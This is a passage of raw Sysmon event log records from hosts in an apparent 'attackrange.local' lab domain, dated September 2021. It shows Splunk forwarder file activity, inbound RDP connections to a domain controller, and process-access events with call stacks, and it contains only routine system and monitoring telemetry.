Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C514CBD50D7B78C12C6B446AE225A0E0,SHA256=6178DB10E8735C8E950D90488423D54C16136353842B59D9D1C2DAE50BCDDA2E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049687Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:21.783{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-60449-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001049686Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:23.433{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9CD79934890DEFA6778F1162A829403D,SHA256=4F6C71F2A69CCF9EFE1548146A7E83E25D718E34D80827521325FAE063EA3465,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978288Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:24.790{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ADC8AB97DF12FBCB90ECB38FEFF43151,SHA256=0BBDA0A39666E7727400883AF5C79707D323C5BF59BD8A10E2A4290D597E4A29,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049691Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:24.768{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001049690Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:22.696{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse162.55.235.26static.26.235.55.162.clients.your-server.de51635-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001049689Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:24.698{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0C827BF18CF259473FD0666CAA84D445,SHA256=F86B93DBAA1E1AB798ABC247FE6A363BB46A588AF2BFDAB973103B3695352ACB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049688Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:24.014{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8547BE67AAC0E25FB74A25D00178491,SHA256=E03E325B8929DBE426544F8F0DF5B09115D96E1130B762158D4D508BE2B6100E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978287Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:24.430{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F6E4D326A356F21066DEF8FD175EAD34,SHA256=3240FF07A3E76A3EA117AC9CBB5D60AF358ED46F8063B220E44CE28627943286,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978286Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:24.430{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C1CF7A22832BCAB59FB2868F751338C1,SHA256=DBC71724AEAEDDD29EB66F07C4CF24310A40503EE70D4376712CE0ED2E70F993,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000978302Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:25.868{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8A45-6151-B279-00000000FD01}3536C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978301Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:25.868{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978300Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:25.868{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978299Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:25.868{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978298Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:25.868{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978297Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:25.868{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978296Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:25.868{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978295Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:25.868{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978294Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:25.868{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978293Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:25.868{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978292Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:25.868{69CF5F33-7F27-614D-0500-00000000FD01}408984C:\Windows\system32\csrss.exe{69CF5F33-8A45-6151-B279-00000000FD01}3536C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000978291Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:25.868{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8A45-6151-B279-00000000FD01}3536C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000978290Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:25.853{69CF5F33-8A45-6151-B279-00000000FD01}3536C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000978289Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:25.790{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9EFA1D997F71AAE6ABA10F5508C4561E,SHA256=949C243087B3B5D8A057BF4743747A4DB66F12F6080652202D8A343D564028B9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049693Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:25.054{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001049692Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:25.034{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0BCA2E30F7B1F4D89BDBF886A5B2D0AC,SHA256=72561C41FF5505FF676AE4642071B09CEA14BAA6DDD7A2CCBDEEE5B46D71A498,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049694Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:26.068{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A5405ABA91400865DF651F67F460B8F,SHA256=A92B8482D5EB2CCB9356DCDA9514956FDA7AD2FCA6E8135E75D4B35AC2F6265C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978318Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:26.993{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F6E4D326A356F21066DEF8FD175EAD34,SHA256=3240FF07A3E76A3EA117AC9CBB5D60AF358ED46F8063B220E44CE28627943286,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000978317Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:26.712{69CF5F33-8A46-6151-B379-00000000FD01}6523376C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978316Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:26.555{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8A46-6151-B379-00000000FD01}652C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978315Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:26.555{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978314Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:26.555{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978313Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:26.555{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978312Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 